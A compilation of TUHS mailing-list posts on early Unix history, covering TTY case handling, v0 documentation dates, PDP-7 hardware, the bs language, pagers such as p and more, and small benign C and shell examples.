So Unix was ASCII from the start. Upper-case from a TTY 33 was converted
to lower. On the PDP-11, at least, there was an escape convention for
upper case. I believe the lower-case convention was explained in the
introduction. In particular if you logged in with an upper-case user
name, the terminal driver was set to convert everything to lower.
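(As an aside, the knob survived as a tty mode; on a V7-style system the
toggling looked roughly like this:
    stty lcase      # map terminal upper case to lower, with \X escapes for real capitals
    stty -lcase     # turn the mapping off
The details varied a bit between versions.)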
Remember, too, that 33's used yellow paper. For printing on white
we had to use other machines that had full ASCII support.
Doug
> does anyone have some eqn input and output that they can share?
I have a quite elaborate document that uses eqn, pic, and tbl. In
fact one table contains both pic and eqn entries (but not subtables;
Latex beats roff in being recursive). Take a look at
www.cs.dartmouth.edu/~doug/wallpaper.pdf. If you think you'd like
to see the source, just holler.
> he maybe should do Latex
Sadly, math journals often demand Latex, but I've also run into
journals that require Word. I wanted to submit the document above
to a cartography journal until I found out they were in the
Word camp. I was, however, able to convert it to Latex.
At one point the American Institute of Physics took only roff
(and retypeset other manuscripts--in roff). I don't know what
their practice is now.
> Maybe v0 didn't have any manuals?
> I understand they weren't in roff anyways.
No manuals, true. But if there had been they would have been
in some version of roff, just as all Research Unix manuals were.
Doug
On Fri, 4 Oct 2019, Ken Thompson via TUHS wrote:
> no, it was tty model 33.
Changing the topic slightly ...
The scans for v0 code are in lowercase. I assume printed on TTY 37.
But why is the early PDP-7 code in lowercase?
I do see the B language code for "lcase" which converts to lowercase.
Maybe something like that was used?
(I think I saw a scan mistake showing a "B" which is probably an "8" due
to that. See pdp7-unix/src/cmd/bc.s "dab B i".)
I didn't see anything in historical login code or manuals about
upper versus lowercase.
Any experiences about upper versus lower case to share?
When did stuff get rewritten to have both cases in code?
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
Several v0 manpages say 11/3/70
See
https://github.com/DoctorWkt/pdp7-unix/commit/14a2a9b10bd4f9c56217234afb321…
The commit message says
"I've borrowed the V1 manuals from
http://minnie.tuhs.org/cgi-bin/utree.pl?file=V1/man/man1
and changed them to reflect the PDP-7 utilities."
Where did that 1970 date come from? Was it just made up? (Notice it is
one year earlier, same day.) Maybe v0 didn't have any manuals? This was
just an exercise in learning PDP7-Unix better? I understand they weren't
in roff anyways.
Also ... what is the earliest known date where we have some
scanned/printed document?
https://www.tuhs.org/Archive/Distributions/Research/McIlroy_v0/
says "runs on the PDP-7 and -9 computers; a more
modern version, a few months old, uses the PDP-11."
but no specific date.
The earliest date I see is from the 1stEdman / Dennis_v1 docs of
November 3, 1971. That is a full set of docs. There must be something
prior to that date.
Anyone know of some early printed memo or other correspondence that
mentions the work?
Thanks,
Jeremy C. Reed
echo 'EhZ[h ^jjf0%%h[[Zc[Z_W$d[j%Xeeai%ZW[ced#]dk#f[d]k_d%' | \
tr '#-~' '\-.-{'
All, very off-topic for TUHS but you have a bounty of experience. If any
of you have Intel ia64 skills and/or experience fixing compiler back-end bugs, could
you contact me off-list? I'm writing a back-end for the SubC compiler and
I have 'one last bug'™ before it can compile itself, and I'm stuck.
Details at: https://minnie.tuhs.org/wktcloud/index.php/s/QdKZAqcBytoFBkQ/download?path=…
Thanks, Warren
I’ve seen it said a couple of places that the DG/UX kernel was an almost complete rewrite and rather well-done.
Have any details been preserved? There’s not a whole lot out there that I’ve been able to find about DG/UX or the AViiON workstation series (whether 88K or Intel x86).
-- Chris
PS - I’ve found that my asking around has prompted some people to put things online, so may as well keep asking in various places. :)
Ok. I know there was never a v6.5... officially. But there are several
references to that in different bits of the early user group news letters.
This refers to v6 plus all the patches that "leaked" out of Bell Labs via
udel and Lou Katz.
My question is, have they survived? The story sure has, but I didn't find
them in the archive..
> From: Jeremy C. Reed
> "PDP-11 that had PDP-10 memory management, KS-1." ... What is this
> PDP-11 and KS-1? Maybe this is the PDP-11/20 with KS-11?
Yes. The reference to "PDP-10 memory management" is because apparently the
KS11 did what the PDP-10 MMU did, i.e. divide the address space into two
sections. (On the -10, one was for code, and one for data.)
Alas, next to nothing is known of the KS11, although I've looked. There's a
mention of it in "Odd Comments and Strange Doings in Unix":
https://www.bell-labs.com/usr/dmr/www/odd.html
but it doesn't say much.
Noel
I read in the PDP-7 reference manual that Precision CRT Display Type 30
and Precision Incremental Display Type 340 are the typical displays used
with the PDP-7, but aren't standard equipment. I read about the
Graphics-II scope. Was it the only display? I read it was used as a
second terminal and that it would pause per display full with a button
to continue.
I assume this second terminal's keyboard was TTY model 33 or similar
since it was the standard equipment. Does anyone know?
Do you know if the PDP-7 or early edition Unixes have pen support for
that Graphics-II or similar displays?
Clem has written that the PDP-7 had a disk from a PDP-9. Where is this
cited?
The ~1971 draft "The UNIX Time-Sharing System" says first version runs
on PDP-9 also.
https://www.tuhs.org/Archive/Distributions/Research/McIlroy_v0/
But I cannot find any other reference of running on PDP-9 at all. Was
this academic?
That draft calls the PDP-7 version the "first edition" but later the
PDP-11/20 is called the "first edition". When did the naming of first
edition get defined to not include the PDP-7 version? Or is it because
the early "0th" version was never released/shared outside?
Thompson interview
https://www.tuhs.org/Archive/Documentation/OralHistory/transcripts/thompson…
mentions an "interim machine" and a "PDP-11 that had PDP-10 memory
management, KS-1." What is this interim machine? Is this a PDP-11
without a disk (for a few months?) What is this PDP-11
and KS-1? Maybe this is the PDP-11/20 with KS-11?
Do we know what hardware was supported for the early editions? We don't
have all the kernel code and from a quick look from what is available I
didn't see specific hardware references.
The later ~1974 "The UNIX Time-Sharing System" paper does mention some
hardware at that time on the PDP-11/45 like a 201 dataset interface and
a Tektronix 611 storage-tube display on a satellite PDP-11/20.
When did a CRT with keyboard terminal like DEC vt01 (with Tektronix 611
CRT display), LS ADM-3, Hazeltine 2000, VT01A display with keyboard
(what keyboard?) get supported? Any code to help find this? (The
https://www.bell-labs.com/usr/dmr/www/picture.html does mention the
VT01A plus keyboard).
Thanks,
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
Does anyone know where I can find the Unix-related interviews with Dr.
Peter Collinson?
These are acknowledged in front-matter of Peter Salus's Quarter Century
book which says previously appeared in ".EXE". Bottom of
https://www.hillside.co.uk/articles/index.html mentions the magazines
aren't found. I didn't try contacting him yet.
I have read the Mahoney collection (archived at TUHS). Any other
interview collections from long ago?
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
Hi TUHS folks,
Earlier this month I did a fair bit of research on a little known Unix
programming language - bs - and updated the wikipedia pages
accordingly.
https://en.wikipedia.org/wiki/Bs_(programming_language)
Thanks for solving some bs mysteries goes to its author, Dick Haight,
as well as those that got us in touch: Doug McIlroy, Brian Kernighan,
and John Mashey.
Apart from what is in the aforementioned wikipedia page, in exchanging
email with me, Dick shared:
q(
I wrote bs at the time Unix (V 3?) and all of the commands were being
converted from assembler to C. So Thompson’s bas became my bs — sort
of. I included snobol’s succeed/fail feature (? Operator/fail return).
[...]
No one asked me to write bs. [...] I tried to get Dennis Ritchie to add
something like “? / fail” to C but he didn’t. This is probably part of
why I wrote bs. I wasn’t part of the Unix inner circle (BTL Computing
Research, e.g., Thompson, Ritchie, McIlroy, etc). Neither were Mashey
& Dolotta. We were “support”.
)
The Release 3.0 manual (1980) mentions bs prominently on page 9:
Writing a program. To enter the text of a source program into a
UNIX file, use ed(1). The four principal languages available under
UNIX are C (see cc(1)), Fortran (see f77(1)), bs (a
compiler/interpreter in the spirit of Basic, see bs(1)), and assembly
language (see as(1)).
Personally, some reasons I find bs noteworthy are (a) it is not much
like BASIC (from today's perspective) and (b) as mentioned in the
wikipedia page, "The bs language is a hybrid interpreter and compiler
and [an early] divergence in Unix programming" (from Research Unix
mentioning only the other three languages):
q(
The bs language was meant for convenient development and debugging of
small, modular programs. It has a collection of syntax and features
from prior, popular languages but it is internally compiled, unlike a
Shell script. As such, in purpose, design, and function, bs is a
largely unknown, modest predecessor of hybrid interpreted/compiled
languages such as Perl and Python.
)
It survives today in some System III-derived or System V-derived
commercial operating systems, including HP-UX and AIX.
If you have additional information that might be useful for the
wikipedia page, please do share it.
Peace,
Dave
P.S. Here is a 2008 TUHS list discussion, "Re: /usr/bin/bs on HPUX?":
On Wed, Dec 10, 2008 at 01:08:26PM -0500, John Cowan wrote:
> Lord Doomicus scripsit:
>
> > I was poking around an HP UX system at work today, and noticed a
> > command I've never noticed before ... /usr/bin/bs.
> >
> > I'm sure it's been there for a long time, even though I've been an
> > HPUX admin for more than a decade, sometimes I'm just blind ... but
> > anyway ....
> >
> > I tried to search on google ... it looks like only HPUX, AIX, and
> > Maybe AU/X has it. Seems to be some kind of pseudo BASIC like
> > interpreter.
>
> That's just what it is. Here are the things I now know about it.
>
> 0. The string "bs" gets an awful lot of false Google hits, no matter
> how hard you try.
>
> 1. "bs" was written at AT&T, probably at the Labs, at some time between
> the release of 32V and System III. It was part of both System III and
> at least some System V releases.
>
> 2. It was probably meant as a replacement for "bas", which was a more
> conventional GW-Basic-style interpreter written in PDP-11 assembly
> language. (32V still had the PDP-11 source, which of course didn't work.)
>
> 3. At one time System III source code was available on the net,
> including bs.c and bs.1, but apparently it no longer is. I downloaded
> it then but don't have it any more.
>
> 4. I was able to compile it under several Unixes, but it wouldn't run:
> I think there must have been some kind of dependency on memory layout,
> but never found out exactly what.
>
> 5. I remember from the man page that it had regular expressions, and
> two commands "compile" and "execute" that switched modes to storing
> expressions and executing them on the spot, respectively. That eliminated
> the need for line numbers.
>
> 6. It was apparently never part of Solaris.
>
> 7. It was never part of any BSD release, on which "bs" was the battleships
> game.
>
> 8. I can't find the man page on line anywhere either.
>
> 9. The man page said it had some Snobol features. I think that meant
> the ability to return failure -- I vaguely remember an "freturn" command.
>
> 10. 99 Bottles of Beer has a sample bs program at
> http://www2.99-bottles-of-beer.net/language-bs-103.html .
>
> 11. If someone sends me a man page, I'll consider reimplementing it as
> Open Source.
>
> --
> We are lost, lost. No name, no business, no Precious, nothing. Only empty.
> Only hungry: yes, we are hungry. A few little fishes, nassty bony little
> fishes, for a poor creature, and they say death. So wise they are; so just,
> so very just. --Gollum    cowan at ccil.org    http://ccil.org/~cowan
--
dave(a)plonka.us http://www.cs.wisc.edu/~plonka/
> From: "Brian L. Stuart"
> (The tmg doc was one I remember not being there.)
Err, TMG(VI) is 1/2 page long. Is that really what you were looking for?
(I _did_ specify the 'UPM'.)
I do happen to have the V6-era TMG _manual_, if that's what you're looking
for.
Noel
All, I'm just musing where is the best place to store Unix documentation.
My Unix Archive is really just a filesystem, so it's not so good to
capture and search metadata.
Is anybody using archive.org, gunkies or something else, and have
recommendations?
Cheers, Warren
I'm looking for complete copies of UNIX NEWS volumes 1-7. 8 and newer are
available on the USENIX site, or on archive.org, but older ones are not. A
few excerpts are published in newer login issues, but nothing complete.
Reading the AUUGN issues, especially the early ones, is quite enlightening
and helps one judge the relative merits of later accounts with better
contemporary context. I was hoping to get the same from UNIX NEWS (later
login) and any other newsletters that may exist from the time (I think I
spotted references to one from the UK in AUUGN). It's really quite
enlightening.
Warner
Hello All.
Believed lost in the mists of time for over 30 years, the Georgia Tech
Software Tools Subsystem for Prime Computers, along with the Georgia Tech
C Compiler for Prime Computers, have been recovered!
The source code and documentation (and binary files) are available in a
Github repo: https://github.com/arnoldrobbins/gt-swt.
The README.md there provides some brief history and credits with respect
to the recovery, and w.r.t. the subsystem and C compilers themselves.
Credit to Scott Lee for making and keeping the tapes and driving the
recovery process, and to Dennis Boone and yours truly for contributing
financially. I set up the repo.
For anyone who used and/or contributed to this software, we hope you'll
enjoy this trip down memory lane.
Feel free to forward this note to interested parties.
Enjoy,
Arnold Robbins
(On behalf of the swt recovery team. :-)
Hello All.
I have revived the 10th edition spell(1) program, allowing it to compile
and run on "modern" systems.
See https://github.com/arnoldrobbins/v10spell ; the README.md gives
an overview of what was done.
Enjoy!
Arnold
Greetings!
As a project for our university's seminar on the PDP-8 I wrote a
compiler for the B language targeting it. It's a bit rough around
the edges and the runtime code needs some work (division and
remainder are missing), but it does compile B code correctly,
generating acceptable code (for my taste, though the function call
sequence could be better).
I hope some of you enjoy this compiler for an important historical
language for an important historical computer (makes me wonder why
the two weren't married before).
https://github.com/fuzxxl/8bc
Yours,
Robert Clausecker
--
() ascii ribbon campaign - for an 8-bit clean world
/\ - against html email - against proprietary attachments
https://2019.eurobsdcon.org/livestream-soria-moria/
Has a live stream. My talk is at 1230 UTC, in just under 2 hours. There will
be a recording I think that I'll be able to share with you in a day or
three.
Warner
Hi!
Is there a public OpenSolaris Git/CVS/SVN ?
The opensolaris.org site is down.
AFAIK the first source set (not complete) was published around June 2005.
The latest available sources were b135 March 2010
(available at TUHS)
https://www.tuhs.org/cgi-bin/utree.pl?file=OpenSolaris_b135
It would be interesting to see an evolution of "pure" SysV R4.
--
-=AV=-
Larry McVoy:
If you have something like perl that needs a zillion sub pages, info
makes sense. For just a man page, info is horrible.
=====
This pokes me in one of my longest-standing complaints:
Manual entries, as printed by man and once upon a time in
the Programmers' Manual Volume 1, should be concise references.
They are not a place for tutorials or long-winded descriptions
or even long lists of hundreds of options (let alone descriptions
of why the developer thinks this is the neatest thing since
sliced bread and what bread he had in his sandwiches that day).
For many programs, one or two pages of concise reference is
all the documentation that's needed; no one needs a ten-page
tutorial on how to use cat or rm or ls, for example. But some
programs really do deserve a longer treatment, either a tutorial
or an extended reference with more detail or both. Those belong
in separate documents, and are why the Programmers' Manual had
a second volume.
Nowadays people think nothing of writing 68-page-long manual
entries (real example from something I'm working with right now)
that are long, chatty lists of options or configuration-file
directives with tutorial information interspersed. The result
makes the developer feel good--look at all the documentation
I've written!!--but it's useless for someone trying to figure
out how to write a configuration file for the first time, and
not so great even for someone trying to edit an existing one.
Even the Research system didn't always get this right; some
manual entries ran on and on and on when what was really
needed was a concise list of something and a longer accompanying
document. (The Tenth Edition manual was much better about
that, mostly because of all the work Doug put in. I doubt
there has ever been a better editor for technical text than
Doug.) But it's far worse now in most systems, because
there's rarely any editor at all; the manuals are just an
accreted clump.
And that's a shame, though I have no suggestions on how
to fix it.
Norman Wilson
Toronto ON
Clem Cole:
Exactly!!!! That's what Eric did when he wrote more(ucb) - he *added to
Unix*. The funny part was that USG thought more(ucb) was a good idea and
then wrote their own, pg(att); which was just as arrogant as the info
behavior from the Gnu folks!!!
======
And others wrote their own too, of course. The one I know
best is p(1), written by Rob Pike in the late 1970s at the
University of Toronto. I encountered it at Caltech on the
system Rob had set up before leaving for Bell Labs (and
which I cared for and hacked on for the next four years
before following him). By the time I reached BTL it was
a normal part of the Research system; I believe it's in
all of the Eighth, Ninth, and Tenth Edition manuals.
p is interesting because it's so much lighter-weight, and
because it has rather a different interior design:
Rather than doing termcappy things, p just prints 22 lines
(or the number specified in an option), then doesn't print
the newline after the 22nd line. Hit return and it will
print the next 22 lines, and so on. The resulting text just
flows up the glass-tty screen without any fuss, cbreak, or
anything. (I believe the first version predated V7 and
therefore cbreak.)
Why 22 lines instead of 24, the common height of glass ttys
back then? Partly because that means you keep a line or two
of context when advancing pages, making reading simpler.
But also because in those days, a standard page destined for
a printer (e.g. from pr or nroff, and therefore from man) was
66 lines long. 22 evenly divides 66, so man something | p
never gives you a screen spanning pages.
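A minimal sketch of that paging loop (an illustration, not Rob's actual code), assuming the continue commands are read from /dev/tty so that piped input still works:

#include <stdio.h>
#include <string.h>

int
main(void)
{
    FILE *tty = fopen("/dev/tty", "r");  /* commands come from the terminal */
    char line[4096], cmd[64];
    int n = 0;

    while (fgets(line, sizeof line, stdin) != NULL) {
        if (tty != NULL && ++n % 22 == 0) {
            line[strcspn(line, "\n")] = '\0';  /* withhold the newline */
            fputs(line, stdout);
            fflush(stdout);
            if (fgets(cmd, sizeof cmd, tty) == NULL)
                break;
            /* the return the user types is echoed by the terminal,
               supplying the line break that was withheld above */
        } else
            fputs(line, stdout);
    }
    return 0;
}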
p was able to back up: type - (and return) instead of just
return, and it reprints the previous 22-line page; -- (return)
the 22 lines before that; and so on. This was implemented
in an interesting and clever way: a wrapper around the standard
I/O library which kept a circular buffer of some fixed number
of characters (8KiB in early versions, I think), and a new
call that, in effect, backed up the file pointer by one character
and returned the character just backed over. That made it easy
to back over the previous N lines: just make that call until
you've seen N newlines, then discard the newline you've just
backed over, and you're at the beginning of the first line you want
to reprint.
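A rough sketch of that wrapper idea (invented names and sizes, not the original library), using a fixed ring of recently read characters:

#include <stdio.h>

#define RINGSIZE 8192

static char ring[RINGSIZE];
static long nread;              /* total characters read so far */
static long pos;                /* current position; pos <= nread */

int
nextc(FILE *fp)                 /* read forward, remembering each character */
{
    int c;

    if (pos < nread)            /* re-reading text already in the ring */
        return (unsigned char)ring[pos++ % RINGSIZE];
    if ((c = getc(fp)) == EOF)
        return EOF;
    ring[nread++ % RINGSIZE] = c;
    pos = nread;
    return c;
}

int
backc(void)                     /* back up one character and return it */
{
    if (pos == 0 || nread - pos >= RINGSIZE)
        return EOF;             /* nothing buffered that far back */
    return (unsigned char)ring[--pos % RINGSIZE];
}

Backing over the previous page is then just a loop over backc() counting newlines, exactly as described above.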
As I vaguely recall, more was able to back up, but only when
reading from a real file, not a pipeline. p could do (limited
but sufficient) backup from a pipeline too.
As a creature of its pre-window-system era, you could also type
!command when p paused.
I remember being quite interested in that wrapper as a
possible library for use in other things, though I never
found a use for it.
I also remember a wonderful Elements-of-Programming-Style
adventure with Rob's code. I discovered it had a bug under some
specific case when read returned less than a full bufferful.
I read the code carefully and couldn't see what was wrong.
So I wrote my own replacement for the problematic subroutine
from scratch, tested it carefully in corner cases, then with
listings of Rob's code and mine side-by-side walked through
each with the problem case and found the bug.
I still carry my own version of p (rewritten from scratch mainly
to make it more portable--Rob's code was old enough to be too
clever in some details) wherever I go; ironically, even back to
U of T where I have been on and off for the past 30 years.
more and less and pg and the like are certainly useful programs;
for various reasons they're not to my taste, but I don't scorn
them. But I can't help being particularly fond of p because it
taught me a few things about programming too.
Norman Wilson
Toronto ON
KatolaZ:
> We can discuss whether the split was necessary or "right" in the first
> instance, as we could discuss whether it was good or not for cat(1) to
> leave Murray Hill in 1979 with no options and come back from Berkeley
> with a source code doubled in size and 9 options in 1982.
We needn't discuss that (though of course there are opinions and
mine are the correct ones), but in the interest of historic accuracy,
I should point out that by 1979 (V7) cat had developed a single option, -u,
to turn off stdio buffering.
Sometime before 1984 or so, that option was removed, and cat was
simplified to just
while ((n = read(fd, buf, sizeof(buf))) > 0)
	write(1, buf, n);
(error checking elided for clarity)
which worked just fine for the rest of the life of the Research
system.
So it's true that BSD added needless (in my humble but correct
opinion) options, but not that it had none before they touched it.
Unless all those other programs were stuffed into cat in an earlier
Berkeley system, but I don't think they were.
Norman Wilson
Toronto ON
(Three cats, no options)
Arthur Krewat:
Which is better, creating a whole new binary to put in /usr/bin to do a
single task, or adding a flag to cat?
Which is better, a proliferation of binaries w/standalone source code,
or a single code tree that can handle slightly different tasks and save
space?
======
Which is simpler to write correctly, to debug, and to maintain:
a simple program that does a single task, or a huge single program
with lots of tasks mashed together?
Which is easier to understand and use, individual programs each
with a few options specialized to a particular task, or a monolith
with many more options some of which apply only to one task or
another, others to all?
What are you trying to optimize for? The speed with which
programmers can churn out yet another featureful utility full
of bugs and corner cases, or the ease with which the end-user
can figure out what tool to use and how to use it?
Norman Wilson
Toronto ON
I fear we're drifting a bit here and the S/N ratio is dropping a bit w.r.t
the actual history of Unix. Please no more on the relative merits of
version control systems or alternative text processing systems.
So I'll try to distract you by saying this. I'm sitting on two artifacts
that have recently been given to me:
+ by two large organisations
+ of great significance to Unix history
+ who want me to keep "mum" about them
+ as they are going to make announcements about them soon *
and I am going slowly crazy as I wait for them to be officially released.
Now you have a new topic to talk about :-)
Cheers, Warren
* for some definition of "soon"
OK. I'm totally confused, and I see contradictory information around. So I
thought I'd ask here.
PWB was started to support unix time sharing at bell labs in 1973 (around
V4 time).
PWB 1.0 was released just after V6 "based on" it. PWB 2.0 was released just
after V7, also "based on" it. Later Unix TS 3.0 would become System III. We
know there was no System I or System II. But was there a Unix TS 1.0 and
2.0? And were they the same thing as PWB 1.0 and 2.0, or somehow just
closely related? And I've seen both Unix/TS and Unix TS. Is there a
preferred spelling?
Thanks for all your help with this topic and sorting things out. It's been
quite helpful for my talk in a few weeks.
Warner
P.S. Would it be inappropriate to solicit feedback on an early version of
my talk from this group? I'm sure they would be rather keener on catching
errors in my understanding of Unix history than just about any other
forum...
Hello TUHS on Tues.,
Warren Toomey suggested I let the group know about a utility that exists at least for iMacs and iOS devices.
It’s called “cathode” and you can find it on the Apple App Store. Please forgive me if this has already been mentioned.
This utility provides for an xterm window that looks like the display of an old *tube. You can set the curvature of the glass, the glow, various scan techniques, 9600 speed, and so on.
It adds that extra dimension to give the look and feel of working on early UNIX with a tube.
I would love to see profiles created that match actual ttys. My favorite tube is the Wyse 50. Another one I remember is a Codex model with “slowopen” set in vi.
Remember how early UNIX terminals behaved with slowopen? The characters would overtype during insert mode in vi, but when you hit escape, the line you just clobbered reappears, shifting the remaining text to the right as appropriate.
Cathode adds a little spice, albeit artificially, to the experience of early UNIX.
Truly,
Bill Corcoran
(*) For the uninitiated, we used to call the tty terminal a “tube.” For example, you might hear my boss say, “Corcoran, that cheese you hacked yesterday launched a runaway that’s now soaking the client’s CPU. Go jump on a free tube and fix it now!”
Noel Chiappa wrote:
> > From: Doug McIlroy
>
> > the absence of multidimensional arrays in C.
>
>?? From the 'C Reference Manual' (no date, but circa 'Typesetter C'), pg. 11:
>
> "If the unadorned declarator D would specify an n-dimensional array .. then
> the declarator D[in+1] yields an (n+1)-dimensional array"
>
>
>I'm not sure if I've _ever_ used one, but they are there.
Yes, C allows arrays of arrays, and I've used them aplenty.
However an "n-dimensional array" has one favored dimension,
out of which you can slice an array of lower dimension. For
example, you can pass a row of a 2D array to a function of a
1D variable, but you can't pass a column. That asymmetry
underlies my assertion. In Python, by contrast, n-dimensional
arrays can be sliced on any dimension.
Doug
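A small self-contained illustration of the asymmetry described above: a row of a 2D array decays to a pointer and can be passed to a function expecting a 1D array, but there is no such expression for a column.

#include <stdio.h>

double
sum(double *v, int n)
{
    double s = 0;
    for (int i = 0; i < n; i++)
        s += v[i];
    return s;
}

int
main(void)
{
    double a[3][4] = {{1,2,3,4},{5,6,7,8},{9,10,11,12}};

    printf("%g\n", sum(a[1], 4));   /* fine: row 1 is a contiguous double[4] */
    /* there is no expression that yields column 2 as a double[3];
       it would have to be copied out element by element */
    return 0;
}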
> Excellent - thanks for the pointer. This shows nroff before troff.
> FWIW: I guess I was misinformed, but I had been under the impression
> that it was the other way around, i.e. nroff was done to be compliant with
> the new troff, replacing roff, although the suggestion here is that he
> wrote it to add macros to roff. I'll note that either way, the dates are all
> possible of course because the U/L case ASR 37 was introduced in 1968, so by
> the early 1970's they would have been around the labs.
nroff was in v2; troff appeared in v4, which incidentally was
typeset in troff.
Because of Joe Ossanna's role in designing the model 37, we
had 37's in the Labs and even in our homes right from the
start of production. But when they went obsolete, they were
a chore to get rid of. As Labs property, they had to be
returned; and picking them up was nobody's priority.
Andy Hall had one on his back porch for a year.
Doug
> From: Doug McIlroy
> the absence of multidimensional arrays in C.
?? From the 'C Reference Manual' (no date, but circa 'Typesetter C'), pg. 11:
"If the unadorned declarator D would specify an n-dimensional array .. then
the declarator D[in+1] yields an (n+1)-dimensional array"
I'm not sure if I've _ever_ used one, but they are there.
Noel
A major topic on this list has been the preservation of computer
history, through museums that collect and operate old hardware,
software emulation of past hardware and software systems, and data
recovery from newly discovered, but previously thought to be lost,
archives.
I came across an article today about another major industry that has
been exceedingly careless about preserving its history:
Wipe Out: When the BBC Kept Erasing Its Own History
https://getpocket.com/explore/item/wipe-out-when-the-bbc-kept-erasing-its-o…
It is a must-read for Dr Who fans on this list.
-------------------------------------------------------------------------------
- Nelson H. F. Beebe Tel: +1 801 581 5254 -
- University of Utah FAX: +1 801 581 4148 -
- Department of Mathematics, 110 LCB Internet e-mail: beebe(a)math.utah.edu -
- 155 S 1400 E RM 233 beebe(a)acm.org beebe(a)computer.org -
- Salt Lake City, UT 84112-0090, USA URL: http://www.math.utah.edu/~beebe/ -
-------------------------------------------------------------------------------
>
> Though the vi clone with the best name was, indisputably, elvis.
>
unfortunately unmaintained.
elvis has a smaller memory footprint, and more pleasant (nroff, later html) based help support than vim. There are no plugins or vimscript features, as well as no python/perl support. I'm interested in a vi with syntax coloring and help support, but I don't need scripting features. Therefore I hope someone will take over maintenance, as I'm too old for that.
> The "block copy in an editor" thing is something which has intrigued
> me for years. poor old ed/ex/vi just couldn't do it, and for the life
> of me, I could not understand why this was "deprecated" by the people
> writing that family of editors.
One might trace it to the founding tenet that a file is a stream of bytes,
reinforced by the absence of multidimensional arrays in C. But it goes
deeper than that.
Ed imposes a structure, making a (finite) file into an array, aka list,
of lines. It's easy to define block moves and copies in a list. But
what are the semantics of a block move, wherein one treats the list
as a ragged-right 2D array? What gets pushed aside? In what direction?
How does a block move into a column that not all destination rows
reach? How do you cope when the bottom gets ragged? How about the
top? Can one move blocks of tab-separated fields?
I think everyone has rued the lack of block operations at one time
or another. But implementing them in any degree of generality is a
stumbling block. What should the semantics be?
> Similarly the 'repeat this sequence of commands' thing which emacs had.
Ed's g command does that, except the sequence can't contain another g.
Sam, barely harder than ed to learn, cures that deficiency and generalizes
in other ways, too--but has no block operations.
Doug
Peter Jeremy:
> NFS ran much faster when you turned off the UDP checksums as well.
> (Though there was still the Ethernet CRC32).
Dave Horsfall:
Blerk... That just tells you that the packet came across the wire more or
less OK.
=====
UDP (and TCP) checksums are nearly useless against
the sort of corruption Larry described. Since they
are a simple addition with carry wraparound, you
can insert or remove any number of word-aligned pairs
of zero octets without the checksum changing.
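A small demonstration of that property (an illustrative sketch), using the usual one's-complement sum over 16-bit words:

#include <stdint.h>
#include <stdio.h>

static uint16_t
cksum(const uint16_t *p, int nwords)
{
    uint32_t sum = 0;

    while (nwords-- > 0)
        sum += *p++;
    while (sum >> 16)                   /* fold the carries back in */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

int
main(void)
{
    uint16_t a[] = { 0x1234, 0x5678, 0x9abc };
    uint16_t b[] = { 0x1234, 0x0000, 0x5678, 0x9abc };  /* zero word inserted */

    printf("%04x %04x\n", cksum(a, 3), cksum(b, 4));    /* prints the same value twice */
    return 0;
}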
I discovered this the hard way, while tracking down
a kernel bug that caused exactly that sort of corruption.
Does IPv6 require a meaningful checksum, or just the
useless old ritual one?
Norman Wilson
Toronto ON
Sorry, i said "yes" to the false question.
--- Forwarded from Steffen Nurpmeso <steffen(a)sdaoden.eu> ---
Date: Mon, 16 Sep 2019 21:12:28 +0200
From: Steffen Nurpmeso <steffen(a)sdaoden.eu>
To: chet.ramey(a)case.edu
Subject: Re: [TUHS] earliest Unix roff
Message-ID: <20190916191228.1YQHs%steffen(a)sdaoden.eu>
OpenPGP: id=EE19E1C1F2F7054F8D3954D8308964B51883A0DD; url=https://ftp.sdaoden.eu/steffen.asc; preference=signencrypt
Chet Ramey wrote in <95916cf9-9aa1-f949-0f37-0ae466e38aa2(a)case.edu>:
|On 9/16/19 8:10 AM, Clem Cole wrote:
|> I use the standalone Info reader (named info) if I want to look at the
|> Info output.
|>
|> Fair enough, but be careful, while I admit I have not looked in a while,
|> info(gnu) relies on emacs keybindings and a number of very emacs'ish things.
|> Every time I have tried to deal with it, I have to unprogram my fingers and
|> reset them to emacs.
|>
|> If it would have used more(1) [or even less(1)] then I would not be as
|> annoyed.
|
|It seems to me that the strength of info (the file format and program) is
|the navigation of a menu-driven hierarchical document containing what are
|essentially selectable links between sections. Something like more or less
|is poorly suited to take advantage of those features.
But you can do that in man macros with a normal pager like
less(1), too. I mean, i may bore people, but yes i have written
a macro extension for the mdoc macros which can be used to
generate a TOC, and which generates document-local links as well as
links to external manual pages. This works for all output
formats, but particularly well for those which support links
themselves, HTML, PDF as well as grotty, the TTY output device of
groff. There was a feature request, but it has not been included
yet. (My own port of roff where it will ship out of the box i just
do not find time for, but i said to myself that after having
banged my head a thousand times against the wall of a totally
f....d up software code base, if i maintain yet another free
software project then this time i do not release anything until
i can say i am ready.)
You can see the manual page online if you want to, it is at [1]
(and itself the HTML output of a manual which uses the macro).
Nothing magic, it is just that the grotty device then uses
backspace escape sequences not only to embolden or otherwise
format text, but also to invisibly embed content information.
And a patched less(1) can search for these specially crafted
backspace sequences easily, in fact i use that each and every time
when i look at the manual page of the MUA i maintain, which is
even longer than the bash manual. The patch for less is pretty
small, even though it cares for less(1)'s conventions:
#?0|kent:less.tar_bomb_git$ git diff master..mdocmx|wc -l
413
[1] https://www.sdaoden.eu/code-mdocmx.html
It has the deficiency of not being able to dig macros as part of
headers, e.g. "HISTORY ON less(1)" where less(1) would be an
external link; this cannot work out the way the mdoc macros are
implemented in groff. They would need to be rewritten, but no
time for that yet. Other than that it has worked just fine for half
a decade; for development i have
mdoc() (
MDOCMX_ENABLE=1
\export MDOCMX_ENABLE
\: ${MDOCMXFLAGS:=-dmx-toc-force=tree}
\mdocmx.sh "${1}" |
\s-roff -Tutf8 -mdoc ${MDOCMXFLAGS} |
LESS= \s-less --RAW-CONTROL-CHARS --ignore-case --no-init
)
where s-roff and s-less are the patched version. This is the
development version, the nice property of mdocmx is that the
preprocessing step can be shipped, in fact it is for half
a decade, too. For such manuals you only need grotty/less to be
patched. So then in less i hit ^A and will be asked
[anchor]:
then i enter the number and it scrolls into view. And ' will
scroll back to where you have been before following the internal
link. Likewise, if the entered number links an external manual
page you first see
Read external manual: !man 1 sh
and if you hit return, you go there, temporarily suspending the
